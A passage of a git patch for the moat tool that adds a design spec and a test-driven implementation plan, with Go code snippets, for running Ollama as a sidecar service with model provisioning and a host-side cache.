From 24ee9556bab2fe1c4209df62232003b124fc8db8 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:29:43 +0000 Subject: [PATCH 01/27] docs: add Ollama sidecar design spec and implementation plan Adds design spec for Ollama as a service dependency with generalized provisions/cache extensions, and a detailed implementation plan with 10 tasks covering registry, types, config, service manager, and docs. --- CLAUDE.md | 6 + .../plans/2026-03-17-ollama-sidecar-design.md | 217 ++++ docs/plans/2026-03-17-ollama-sidecar-plan.md | 1107 +++++++++++++++++ 3 files changed, 1330 insertions(+) create mode 100644 docs/plans/2026-03-17-ollama-sidecar-design.md create mode 100644 docs/plans/2026-03-17-ollama-sidecar-plan.md diff --git a/CLAUDE.md b/CLAUDE.md index 7a8ca104..efb6b98f 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -171,6 +171,12 @@ Documentation is part of the feature. A feature without docs is incomplete. - Scope is optional but encouraged (e.g., `feat(api): add user endpoint`) - Do not include `Co-Authored-By` lines for Claude in commit messages +## Design Specs & Plans + +- Store all design specs and implementation plans in `docs/plans/` +- Naming convention: `YYYY-MM-DD--design.md` for specs, `YYYY-MM-DD--plan.md` for plans +- Do not create `docs/superpowers/` or other directories for specs — `docs/plans/` is the single location + ## Creating Pull Requests - Use `gh pr create` with default flags only (no `--base`, `--head`, etc.) diff --git a/docs/plans/2026-03-17-ollama-sidecar-design.md b/docs/plans/2026-03-17-ollama-sidecar-design.md new file mode 100644 index 00000000..e9a00e25 --- /dev/null +++ b/docs/plans/2026-03-17-ollama-sidecar-design.md @@ -0,0 +1,217 @@ +# Ollama Sidecar Service + +## Summary + +Add Ollama as a service dependency, following the established postgres/mysql/redis pattern. An agent declares `ollama` in `dependencies:` and lists models under `services.ollama.models`. Moat starts an Ollama sidecar, pulls declared models, caches them on the host, and injects `MOAT_OLLAMA_*` environment variables into the agent container. + +## Motivation + +AI agents running inside moat containers may need access to local model inference — for embeddings, sub-tasks, code review, or other LLM calls — without requiring external API keys or network access to hosted inference services. + +## Design + +### User-facing config + +```yaml +# moat.yaml +name: my-agent + +dependencies: + - ollama@0.9 + +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + +The agent receives: + +```bash +MOAT_OLLAMA_HOST=ollama +MOAT_OLLAMA_PORT=11434 +MOAT_OLLAMA_URL=http://ollama:11434 +``` + +No password, user, or database — Ollama has no auth. + +### Registry entry + +```yaml +# registry.yaml +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" +``` + +### Generalized service extensions + +Rather than adding Ollama-specific fields to `ServiceDef`, this design introduces two general-purpose concepts that any future service can use: + +**Provisions** — A pattern for "pull/load N things at startup": +- `provisions_key`: Names the key in user's `services.` config (e.g., `models`). The config layer maps this to an explicit `Provisions []string` field on `ServiceSpec` during parsing. +- `provision_cmd`: Command template with `{item}` placeholder, executed once per item inside the sidecar + +**Cache** — Host-side persistence for service data: +- `cache_path`: Container path to mount. Host side is `~/.moat/cache//` + +These fields are optional. Existing services (postgres, mysql, redis) don't use them and are unaffected. + +Note: this is a simple "pull N items" pattern. Services requiring more complex provisioning (ordered steps, dependencies between items, conditional logic) should use a different mechanism rather than extending these fields. + +### Struct changes + +**`ServiceDef`** (`internal/deps/types.go`): + +```go +type ServiceDef struct { + // ... existing fields ... + CachePath string `yaml:"cache_path,omitempty"` + ProvisionsKey string `yaml:"provisions_key,omitempty"` + ProvisionCmd string `yaml:"provision_cmd,omitempty"` +} +``` + +**`ServiceConfig`** (`internal/container/runtime.go`): + +```go +type ServiceConfig struct { + // ... existing fields ... + CachePath string // container-side path (e.g., /root/.ollama) + CacheHostPath string // host-side path (e.g., ~/.moat/cache/ollama/) + Provisions []string + ProvisionCmd string +} +``` + +`CacheHostPath` is resolved in `buildServiceConfig` (run layer), which has access to the moat home directory. Both paths are passed through so `buildSidecarConfig` can construct the bind mount. + +**`ServiceSpec`** (`internal/config/config.go`): + +```go +type ServiceSpec struct { + Env map[string]string `yaml:"env,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + Provisions []string `yaml:"provisions,omitempty"` +} +``` + +`Provisions` is an explicit, typed field. The `config` package parses `ServiceSpec` with deferred handling for unknown keys (using `yaml.Node` or a raw map). The mapping from user-facing key (e.g., `models`) to `Provisions` happens in `buildServiceConfig` in the run layer (`internal/run/services.go`), which has access to both the registry's `provisions_key` and the parsed user spec. This avoids a package dependency from `config` → `deps`. Unknown keys that don't match the registry's `provisions_key` produce a validation error at this stage, catching typos like `model:` instead of `models:`. + +**`ServiceManager`** (`internal/container/runtime.go`) — add provisioning method: + +```go +type ServiceManager interface { + StartService(ctx context.Context, cfg ServiceConfig) (ServiceInfo, error) + CheckReady(ctx context.Context, info ServiceInfo) error + StopService(ctx context.Context, info ServiceInfo) error + SetNetworkID(id string) + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error +} +``` + +`ProvisionService` executes commands sequentially inside the service container. This keeps provisioning within the `ServiceManager` abstraction rather than reaching through to `Runtime.Exec` from the run layer. Both `dockerServiceManager` and `appleServiceManager` implement it using their respective exec mechanisms. + +### Password generation guard + +The existing `buildServiceConfig` unconditionally generates a password. For services with no auth (like Ollama, where `password_env` is empty), this produces a phantom password env var. Fix: only generate a password when `spec.Service.PasswordEnv` is non-empty. This prevents spurious `MOAT_OLLAMA_PASSWORD` injection. + +### Cache volume mount + +- **Host path:** `~/.moat/cache//` (e.g., `~/.moat/cache/ollama/`) +- **Container path:** Value of `cache_path` (e.g., `/root/.ollama`) +- **Created:** `os.MkdirAll` before starting the sidecar +- **Wired in:** + - **Docker:** `buildSidecarConfig` adds a `MountConfig` to `SidecarConfig.Mounts` (already supported) + - **Apple:** `buildAppleRunArgs` needs new mount plumbing. The Apple container CLI supports `--mount type=bind,source=,target=` but `buildAppleRunArgs` currently has no mount logic. This requires adding mount arg construction, similar to how the main Apple runtime handles mounts in `apple.go`. +- **Permissions:** The `ollama/ollama` image runs as root. The host cache directory is created with default permissions. On Docker this works (root in container = root or remapped UID on host). On Apple containers, ownership semantics should be tested during implementation. +- **Concurrency:** Ollama handles concurrent reads to its model cache. For concurrent pulls from parallel runs, use `flock`-based advisory locking on `~/.moat/cache//.lock` during the provision phase. The lock is held only during provisioning, not for the run lifetime. This is low effort and prevents potential cache corruption. +- **Assumption:** `cache_path` assumes the default Ollama model storage location (`/root/.ollama`). Custom Ollama images with different home directories would need to override this via the `services.ollama.env` mechanism (e.g., `OLLAMA_MODELS=/custom/path`). + +### Provisioning and readiness + +Two-phase readiness for services with provisions: + +1. **Phase 1 — Service healthy:** Poll `readiness_cmd` (`ollama list`) until success. Same `waitForServiceReady` loop (1s interval, 30s timeout). + +2. **Phase 2 — Provision items:** For each item in `Provisions`, call `ServiceManager.ProvisionService` which execs `provision_cmd` with `{item}` replaced inside the sidecar. Sequential execution to avoid overwhelming CPU/disk. + +**Failure semantics:** Fail-fast — abort the run on the first provision failure. Error message includes the failed command, its output, and a hint to check `moat logs ` for service container logs. + +**Timeouts:** +- Phase 1: Existing 30s readiness timeout +- Phase 2: Separate 30-minute provision timeout for the entire phase (model pulls can be GBs). This is a known limitation — if total pull time exceeds 30 minutes, the run fails. Users can work around this by pre-warming the cache with a smaller run first. The timeout is not user-configurable in this iteration. + +**Implementation:** New `provisionService` function in `internal/run/services.go`, called after `waitForServiceReady`. Builds command list from `ServiceConfig.Provisions` and `ServiceConfig.ProvisionCmd`, then calls `ServiceManager.ProvisionService`. Hooks into `manager.go` in the service readiness loop, right after `waitForServiceReady` returns and before env injection. + +**Cache hits:** If a model is already cached from a previous run, `ollama pull` returns near-instantly ("model already exists"). The provision command always runs; caching makes it fast. + +**User feedback:** Provision exec stdout/stderr streams raw to the user's stderr (not through `ui.Info` which adds prefixes). This is appropriate for long-running download progress bars. It is the first time the service startup path produces streaming user-visible output — existing service startups are silent. + +**`wait: false` interaction:** When a user sets `wait: false` on a service, both readiness polling and provisioning are skipped. This is consistent — `wait: false` means "do not block on this service." The agent must handle model availability itself. + +**Command execution:** Provision commands are executed via `sh -c ` inside the service container, matching the existing readiness check pattern in `CheckReady`. + +### Lifecycle + +Follows existing service lifecycle exactly: + +1. Parse dependencies, identify Ollama as a service +2. Create Docker network +3. Pull `ollama/ollama:0.9` image +4. Start Ollama sidecar with cache volume mounted +5. Phase 1: Wait for Ollama HTTP server (readiness check) +6. Phase 2: Pull each declared model (provision step) +7. Inject `MOAT_OLLAMA_*` environment variables +8. Start agent container + +Shutdown: same as other services — force-remove sidecar. Cache persists on host. + +### Constraints + +- **CPU only.** No GPU passthrough in this implementation. GPU support (Docker `--gpus`, Apple Metal) is a clean follow-up — the config shape doesn't need to change. +- **Ephemeral sidecar, persistent cache.** The Ollama process is destroyed with the run. The model cache survives across runs. + +### Future work + +- **GPU passthrough** — Docker `--gpus all` (NVIDIA Container Toolkit), Apple Metal (automatic on Apple containers) +- **Cache cleanup** — `moat clean --cache` to reclaim disk from `~/.moat/cache/`. Model caches can grow to tens of GB without a cleanup mechanism. +- **Provision timeout configuration** — User-configurable timeout in `moat.yaml` for services with large provisioning steps. +- **Configurable cache path** — Allow overriding `cache_path` via `services.ollama.env` with `OLLAMA_MODELS` for custom Ollama images. + +## Files changed + +| File | Change | +|------|--------| +| `internal/deps/registry.yaml` | Add `ollama` service entry with `cache_path`, `provisions_key`, `provision_cmd` | +| `internal/deps/types.go` | Add `CachePath`, `ProvisionsKey`, `ProvisionCmd` to `ServiceDef` | +| `internal/container/runtime.go` | Add `CachePath`, `Provisions`, `ProvisionCmd` to `ServiceConfig`; add `ProvisionService` to `ServiceManager` interface | +| `internal/config/config.go` | Add `Provisions` field to `ServiceSpec`, deferred unknown-key handling in `UnmarshalYAML` | +| `internal/run/services.go` | Add `provisionService` function, populate new `ServiceConfig` fields in `buildServiceConfig`, wire cache path, guard password generation | +| `internal/container/docker_service.go` | Implement `ProvisionService`, mount cache volume in `buildSidecarConfig` | +| `internal/container/apple_service.go` | Implement `ProvisionService`, add mount support to `buildAppleRunArgs` | +| `internal/container/service_helpers.go` | No changes expected | +| `examples/service-ollama/moat.yaml` | New example | +| `examples/service-ollama/demo.sh` | New example | +| `docs/content/guides/08-services.md` | Add Ollama section | +| `docs/content/reference/06-dependencies.md` | Add Ollama to registry table | +| `docs/content/reference/02-moat-yaml.md` | Document `services..` pattern | + +## Testing + +- **Unit tests:** `buildServiceConfig` with Ollama spec, `ServiceSpec` custom unmarshaling (valid key, typo key, missing key), `provisionService` with mock `ServiceManager`, password generation guard for no-auth services +- **Integration test:** `internal/e2e/services_test.go` — start Ollama sidecar, verify env vars injected, verify model accessible via API +- **Manual test:** `moat run examples/service-ollama` — should print model list and generate a response diff --git a/docs/plans/2026-03-17-ollama-sidecar-plan.md b/docs/plans/2026-03-17-ollama-sidecar-plan.md new file mode 100644 index 00000000..0812a056 --- /dev/null +++ b/docs/plans/2026-03-17-ollama-sidecar-plan.md @@ -0,0 +1,1107 @@ +# Ollama Sidecar Service Implementation Plan + +> **For agentic workers:** REQUIRED: Use superpowers:subagent-driven-development (if subagents available) or superpowers:executing-plans to implement this plan. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Add Ollama as a service dependency with model provisioning and host-side caching, following the existing postgres/mysql/redis sidecar pattern. + +**Architecture:** Extend the service dependency system with two general-purpose concepts — provisions (pull N items at startup) and cache (host-side persistence). Ollama is the first consumer. The registry entry, config parsing, service manager interface, and both Docker/Apple implementations are all modified. + +**Tech Stack:** Go, Docker API, Apple container CLI, YAML parsing + +**Spec:** `docs/plans/2026-03-17-ollama-sidecar-design.md` + +--- + +## Chunk 1: Registry and type changes + +### Task 1: Add provision/cache fields to ServiceDef + +**Files:** +- Modify: `internal/deps/types.go:106-119` (ServiceDef struct) + +- [ ] **Step 1: Write the failing test** + +Add to `internal/deps/registry_test.go`: + +```go +func TestRegistryHasOllama(t *testing.T) { + ollama, ok := GetSpec("ollama") + if !ok { + t.Fatal("Registry should have 'ollama'") + } + if ollama.Type != TypeService { + t.Errorf("ollama.Type = %v, want %v", ollama.Type, TypeService) + } + if ollama.Service == nil { + t.Fatal("ollama.Service should not be nil") + } + assert.Equal(t, "ollama/ollama", ollama.Service.Image) + assert.Equal(t, 11434, ollama.Service.Ports["default"]) + assert.Equal(t, "OLLAMA", ollama.Service.EnvPrefix) + assert.Equal(t, "/root/.ollama", ollama.Service.CachePath) + assert.Equal(t, "models", ollama.Service.ProvisionsKey) + assert.Equal(t, "ollama pull {item}", ollama.Service.ProvisionCmd) + assert.Empty(t, ollama.Service.PasswordEnv) +} +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `go test ./internal/deps/ -run TestRegistryHasOllama -v` +Expected: FAIL — ollama not found in registry, and `CachePath`/`ProvisionsKey`/`ProvisionCmd` fields don't exist on `ServiceDef`. + +- [ ] **Step 3: Add fields to ServiceDef** + +In `internal/deps/types.go`, add three fields to `ServiceDef` after the `URLFormat` field: + +```go + // CachePath is the container-side path to mount for host-side caching. + // If set, ~/.moat/cache// is bind-mounted here. + // This allows data to persist across runs (e.g., downloaded models). + CachePath string `yaml:"cache_path,omitempty"` + + // ProvisionsKey names the key in user's services. config that contains + // a list of items to provision (e.g., "models"). Used with ProvisionCmd. + ProvisionsKey string `yaml:"provisions_key,omitempty"` + + // ProvisionCmd is a command template executed once per provision item. + // The placeholder {item} is replaced with each item value. + // Commands run via sh -c inside the service container after readiness. + ProvisionCmd string `yaml:"provision_cmd,omitempty"` +``` + +- [ ] **Step 4: Add ollama entry to registry.yaml** + +Add to `internal/deps/registry.yaml` in the "Service dependencies" section, after redis: + +```yaml +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" +``` + +- [ ] **Step 5: Run test to verify it passes** + +Run: `go test ./internal/deps/ -run TestRegistryHasOllama -v` +Expected: PASS + +- [ ] **Step 6: Run all deps tests** + +Run: `go test ./internal/deps/ -v -count=1` +Expected: All PASS + +- [ ] **Step 7: Commit** + +```bash +git add internal/deps/types.go internal/deps/registry.yaml internal/deps/registry_test.go +git commit -m "feat(deps): add ollama service and provision/cache fields to ServiceDef" +``` + +--- + +### Task 2: Add provision/cache fields to ServiceConfig + +**Files:** +- Modify: `internal/container/runtime.go:209-221` (ServiceConfig struct) + +- [ ] **Step 1: Add fields to ServiceConfig** + +In `internal/container/runtime.go`, add four fields to `ServiceConfig` after `ReadinessCmd`: + +```go + // CachePath is the container-side path for cache mounting (e.g., "/root/.ollama"). + CachePath string + // CacheHostPath is the resolved host-side path (e.g., "~/.moat/cache/ollama/"). + CacheHostPath string + // Provisions is the list of items to provision (e.g., model names). + Provisions []string + // ProvisionCmd is the command template with {item} placeholder. + ProvisionCmd string +``` + +- [ ] **Step 2: Verify compilation** + +Run: `go build ./internal/container/...` +Expected: Success + +- [ ] **Step 3: Commit** + +```bash +git add internal/container/runtime.go +git commit -m "feat(container): add provision and cache fields to ServiceConfig" +``` + +--- + +### Task 3: Add ProvisionService to ServiceManager interface + +**Files:** +- Modify: `internal/container/runtime.go:199-206` (ServiceManager interface) +- Modify: `internal/container/docker_service.go` (add method) +- Modify: `internal/container/apple_service.go` (add method) +- Modify: `internal/container/docker_service_test.go` (add test) +- Modify: `internal/container/apple_service_test.go` (add test) + +- [ ] **Step 1: Write failing tests** + +Add to `internal/container/docker_service_test.go`: + +```go +func TestBuildSidecarConfigWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-789") + assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) + + // Verify cache mount is present + require.Len(t, sidecarCfg.Mounts, 1) + assert.Equal(t, "/tmp/test-cache/ollama", sidecarCfg.Mounts[0].Source) + assert.Equal(t, "/root/.ollama", sidecarCfg.Mounts[0].Target) + assert.False(t, sidecarCfg.Mounts[0].ReadOnly) +} + +func TestBuildSidecarConfigNoCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "postgres", + Version: "17", + Image: "postgres", + Env: map[string]string{}, + RunID: "test-run-000", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-000") + assert.Empty(t, sidecarCfg.Mounts) +} +``` + +Add to `internal/container/apple_service_test.go`: + +```go +func TestAppleBuildRunArgsWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + args := buildAppleRunArgs(cfg, "moat-test-net") + assert.Contains(t, args, "--volume") + // Find the volume arg value + for i, a := range args { + if a == "--volume" && i+1 < len(args) { + assert.Equal(t, "/tmp/test-cache/ollama:/root/.ollama", args[i+1]) + return + } + } + t.Fatal("--volume flag not found in args") +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/container/ -run "TestBuildSidecarConfigWithCachePath|TestBuildSidecarConfigNoCachePath|TestAppleBuildRunArgsWithCachePath" -v` +Expected: FAIL — cache mount not implemented + +- [ ] **Step 3: Add ProvisionService to ServiceManager interface** + +In `internal/container/runtime.go`, add to `ServiceManager` interface: + +```go + // ProvisionService executes commands sequentially inside the service container. + // Each command is run via sh -c. stdout receives streaming output for user feedback. + // Returns on first command failure (fail-fast). + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error +``` + +- [ ] **Step 4: Add cache mount to Docker buildSidecarConfig** + +In `internal/container/docker_service.go`, in `buildSidecarConfig`, add after the `SidecarConfig` struct literal is built (before `if len(cfg.ExtraCmd) > 0`): + +```go + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + sc.Mounts = append(sc.Mounts, MountConfig{ + Source: cfg.CacheHostPath, + Target: cfg.CachePath, + }) + } +``` + +- [ ] **Step 5: Implement ProvisionService on dockerServiceManager** + +Add `"github.com/docker/docker/pkg/stdcopy"` to imports. Then add to `internal/container/docker_service.go`: + +```go +// ProvisionService executes commands sequentially inside the service container. +func (m *dockerServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCreateResp, err := m.cli.ContainerExecCreate(ctx, info.ID, dockercontainer.ExecOptions{ + Cmd: []string{"sh", "-c", cmd}, + AttachStdout: true, + AttachStderr: true, + }) + if err != nil { + return fmt.Errorf("creating exec for provision command %q: %w", cmd, err) + } + + resp, err := m.cli.ContainerExecAttach(ctx, execCreateResp.ID, dockercontainer.ExecAttachOptions{}) + if err != nil { + return fmt.Errorf("attaching to provision command %q: %w", cmd, err) + } + // Use stdcopy to demultiplex Docker's stream protocol headers. + // Without this, binary framing bytes would be mixed into the output. + _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) + resp.Close() + + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if execInspect.ExitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + } + } + return nil +} +``` + +- [ ] **Step 6: Add cache mount to Apple buildAppleRunArgs** + +In `internal/container/apple_service.go`, in `buildAppleRunArgs`, add after the network block and before env sorting: + +```go + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) + } +``` + +- [ ] **Step 7: Implement ProvisionService on appleServiceManager** + +Add to `internal/container/apple_service.go`: + +```go +// ProvisionService executes commands sequentially inside the service container. +func (m *appleServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCmd := exec.CommandContext(ctx, m.containerBin, "exec", info.ID, "sh", "-c", cmd) + execCmd.Stdout = stdout + execCmd.Stderr = stdout + if err := execCmd.Run(); err != nil { + return fmt.Errorf("provision command %q failed: %w", cmd, err) + } + } + return nil +} +``` + +- [ ] **Step 8: Run tests to verify they pass** + +Run: `go test ./internal/container/ -run "TestBuildSidecarConfigWithCachePath|TestBuildSidecarConfigNoCachePath|TestAppleBuildRunArgsWithCachePath" -v` +Expected: PASS + +- [ ] **Step 9: Run all container tests** + +Run: `go test ./internal/container/ -v -count=1` +Expected: All PASS + +- [ ] **Step 10: Commit** + +```bash +git add internal/container/runtime.go internal/container/docker_service.go internal/container/apple_service.go internal/container/docker_service_test.go internal/container/apple_service_test.go +git commit -m "feat(container): add ProvisionService and cache mount support to service managers" +``` + +--- + +## Chunk 2: Config parsing and service orchestration + +### Task 4: Add Provisions field to ServiceSpec with deferred unknown-key handling + +**Files:** +- Modify: `internal/config/config.go:150-163` (ServiceSpec struct) +- Modify: `internal/config/config_test.go` (add tests) + +- [ ] **Step 1: Write failing tests** + +Add to `internal/config/config_test.go`: + +```go +func TestServiceSpecUnmarshalWithExtra(t *testing.T) { + input := ` +env: + FOO: bar +wait: false +models: + - qwen2.5-coder:7b + - nomic-embed-text +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "bar", spec.Env["FOO"]) + assert.False(t, spec.ServiceWait()) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, spec.Extra["models"]) +} + +func TestServiceSpecUnmarshalNoExtra(t *testing.T) { + input := ` +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) + assert.Empty(t, spec.Extra) +} + +func TestServiceSpecUnmarshalPreservesImage(t *testing.T) { + input := ` +image: custom-postgres:17 +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "custom-postgres:17", spec.Image) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) +} + +func TestServiceSpecUnmarshalEmptyExtra(t *testing.T) { + input := ` +env: + FOO: bar +models: [] +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Empty(t, spec.Extra["models"]) +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/config/ -run "TestServiceSpecUnmarshal" -v` +Expected: FAIL — `Extra` field doesn't exist on `ServiceSpec` + +- [ ] **Step 3: Implement ServiceSpec changes** + +In `internal/config/config.go`, replace the `ServiceSpec` struct and add `UnmarshalYAML`: + +```go +// ServiceSpec allows customizing service behavior. +type ServiceSpec struct { + Env map[string]string `yaml:"env,omitempty"` + Image string `yaml:"image,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + // Extra holds unknown list-valued keys (e.g., "models" for ollama). + // Populated by UnmarshalYAML. The run layer maps these to provisions + // using the registry's provisions_key. + Extra map[string][]string `yaml:"-"` +} + +// UnmarshalYAML implements custom unmarshaling to capture unknown list-valued keys +// into Extra. Known keys (env, image, wait) are parsed normally. +func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { + // First, decode known fields using an alias to avoid recursion. + type plain ServiceSpec + if err := value.Decode((*plain)(s)); err != nil { + return err + } + + // Then scan for unknown keys that have sequence values. + if value.Kind != yaml.MappingNode { + return nil + } + known := map[string]bool{"env": true, "image": true, "wait": true} + for i := 0; i+1 < len(value.Content); i += 2 { + key := value.Content[i].Value + val := value.Content[i+1] + if known[key] { + continue + } + if val.Kind == yaml.SequenceNode { + items := make([]string, 0, len(val.Content)) + for _, item := range val.Content { + items = append(items, item.Value) + } + if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = items + } + } + return nil +} +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/config/ -run "TestServiceSpecUnmarshal" -v` +Expected: PASS + +- [ ] **Step 5: Run all config tests** + +Run: `go test ./internal/config/ -v -count=1` +Expected: All PASS + +- [ ] **Step 6: Commit** + +```bash +git add internal/config/config.go internal/config/config_test.go +git commit -m "feat(config): add Extra field to ServiceSpec for provision lists" +``` + +--- + +### Task 5: Update buildServiceConfig for provisions, cache, and password guard + +**Files:** +- Modify: `internal/run/services.go:101-175` +- Modify: `internal/run/services_test.go` + +- [ ] **Step 1: Write failing tests** + +Add to `internal/run/services_test.go`: + +```go +func TestBuildServiceConfigOllama(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b", "nomic-embed-text"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.NoError(t, err) + + assert.Equal(t, "ollama", cfg.Name) + assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "ollama/ollama", cfg.Image) + assert.Equal(t, 11434, cfg.Ports["default"]) + assert.Equal(t, "/root/.ollama", cfg.CachePath) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, cfg.Provisions) + + // Ollama has no auth — no password should be set + assert.Empty(t, cfg.Env) + assert.Empty(t, cfg.PasswordEnv) +} + +func TestBuildServiceConfigOllamaNoModels(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-ollama", nil) + require.NoError(t, err) + + assert.Empty(t, cfg.Provisions) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) +} + +func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + + // No password env var should be set when PasswordEnv is empty + _, hasPassword := cfg.Env["password"] + assert.False(t, hasPassword, "should not set phantom password for no-auth services") +} + +func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-pg", nil) + require.NoError(t, err) + + assert.NotEmpty(t, cfg.Env["POSTGRES_PASSWORD"], "postgres should still get a password") +} + +func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "model": {"qwen2.5-coder:7b"}, // typo: "model" instead of "models" + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "model") +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/run/ -run "TestBuildServiceConfigOllama|TestBuildServiceConfigNoPassword|TestBuildServiceConfigPostgresStillHas|TestBuildServiceConfigValidatesProvisionsKey" -v` +Expected: FAIL + +- [ ] **Step 3: Update buildServiceConfig** + +Replace `buildServiceConfig` in `internal/run/services.go`: + +```go +// buildServiceConfig creates a ServiceConfig for a service dependency. +// Populates both generic fields and service definition fields from the registry. +func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.ServiceSpec) (container.ServiceConfig, error) { + spec, ok := deps.GetSpec(dep.Name) + if !ok || spec.Service == nil { + return container.ServiceConfig{}, fmt.Errorf("unknown service: %s", dep.Name) + } + if spec.Type != deps.TypeService { + return container.ServiceConfig{}, fmt.Errorf("%s has type %q but expected %q", dep.Name, spec.Type, deps.TypeService) + } + + env := make(map[string]string) + + // Only generate password for services that have auth + if spec.Service.PasswordEnv != "" { + password, err := generatePassword() + if err != nil { + return container.ServiceConfig{}, err + } + env[spec.Service.PasswordEnv] = password + + // Set extra_env from registry with placeholder substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v + } + } else { + // No auth — still apply extra_env without password substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + env[k] = v + } + } + + // Apply user overrides + if userSpec != nil { + for k, v := range userSpec.Env { + env[k] = v + } + } + + // Resolve provisions from user spec Extra using registry's provisions_key + var provisions []string + if userSpec != nil && spec.Service.ProvisionsKey != "" { + provisions = userSpec.Extra[spec.Service.ProvisionsKey] + + // Validate: reject unknown Extra keys that don't match provisions_key + for key := range userSpec.Extra { + if key != spec.Service.ProvisionsKey { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid key (did you mean %q?)", + dep.Name, key, spec.Service.ProvisionsKey, + ) + } + } + } else if userSpec != nil && len(userSpec.Extra) > 0 { + // Service doesn't support provisions but user provided extra keys + for key := range userSpec.Extra { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid configuration key", + dep.Name, key, + ) + } + } + + // Resolve cache host path + var cacheHostPath string + if spec.Service.CachePath != "" { + homeDir, err := os.UserHomeDir() + if err != nil { + return container.ServiceConfig{}, fmt.Errorf("resolving home directory for cache: 